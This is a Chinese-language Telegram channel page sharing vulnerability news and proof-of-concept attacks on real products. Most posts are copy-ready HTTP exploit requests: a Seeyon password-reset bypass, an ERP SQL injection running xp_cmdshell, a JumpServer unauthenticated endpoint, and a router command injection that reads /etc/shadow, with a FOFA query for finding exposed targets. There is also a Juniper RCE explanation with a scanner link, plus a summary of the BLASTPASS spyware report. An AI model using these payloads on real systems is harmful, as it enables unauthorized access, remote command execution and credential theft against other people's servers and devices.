🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥(数据看文件)
46.4K subscribers
46 photos
8 videos
356 files
73 links
Download Telegram
BLASTPASS NSO集团iPhone零点击,0day 漏洞在野外捕获
上周,而检查由华盛顿特区的民间社会组织与国际办事处雇用的个人的设备,公民实验室发现了一个积极利用零点击漏洞被用来提供NSO集团的飞马雇佣军间谍软件。
BLASTPASS漏洞利用链
我们将漏洞利用链称为BLASTPASS。该漏洞链能够在受害者没有任何交互的情况下危及运行iOS最新版本(16.6)的iPhone .
所涉及的漏洞帕斯卡附件包含从攻击者iMessage Account发送给受害者的恶意图像。
我们期望在未来发布一个更详细的关于漏洞利用链的讨论。

https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/
7👍7🔥1
致远 短信验证码绕过重置密码漏洞 POC
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1 Host: ip:port
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"admin"}
👍162👏1
💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥
11
企望ERP系统 RCE
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'
👍105
大家猜猜超索怎么被抓的?
👍14🤔94
JumpServer未授权访问漏洞 CVE-2023-42442

访问http://*url*/api/v1/terminal/sessions/
2👍2
移动路由器Cellular Router命令执行漏洞
FOFA搜索语句
title="index" && header="lighttpd/1.4.30"

GET /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912 HTTP/1.1
Host: x.x.x.x
👍64😁1
Juniper 防火墙RCE
非常有意思的一个漏洞
Juniper 防火墙使用Appweb Web 服务器。当Appweb调用CGI脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的HTTP请求。HTTP 请求的正文通过 stdin 传递。受影响的防火墙运行 FreeBSD,每个 FreeBSD 进程都可以通过打开/dev/fd/0. 通过发送 HTTP 请求,我们能够/dev/fd/0向系统引入一个“文件”。

https://github.com/vulncheck-oss/cve-2023-36845-scanner
细节
https://vulncheck.com/blog/juniper-cve-2023-36845/
9👍9